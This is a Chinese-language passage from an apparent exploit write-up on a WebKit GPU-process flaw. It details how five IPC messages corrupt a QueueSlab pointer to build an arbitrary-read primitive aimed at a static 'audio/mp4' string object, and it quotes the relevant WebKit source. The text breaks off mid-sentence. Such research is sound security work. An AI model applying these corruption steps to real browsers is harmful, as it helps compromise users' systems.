反复进行 - 任意读取
下一阶段是构建任意读取原语,这次使用5个IPC:
- MapAsync - 设置溢出的目标指针
- Unmap - 执行溢出,破坏队列元数据
- SetCTM - 设置参数
- FillRect - 通过受控指针写入参数
- CreateRecorder - 返回从任意地址读取的数据
任意读取 IPC 1 & 2:MapAsync/Unmap
MapAsync和Unmap用于再次破坏相同的QueueSlab对象,但这次队列slab缓冲区指针被破坏为指向以下符号下方0x18字节处:
WebCore::MediaRecorderPrivateWriter::mimeType(void)const::$_11::operator() const(void)::impl
具体来说,该符号是从此函数返回的"audio/mp4"字符串的常量StringImpl对象:
const String&
MediaRecorderPrivateWriter::mimeType() const {
static NeverDestroyed
audioMP4(MAKE_STATIC_STRING_IMPL("audio/mp4"));
static NeverDestroyed
videoMP4(MAKE_STATIC_STRING_IMPL("video/mp4"));
return m_hasVideo ? videoMP4 : audioMP4;
}
具体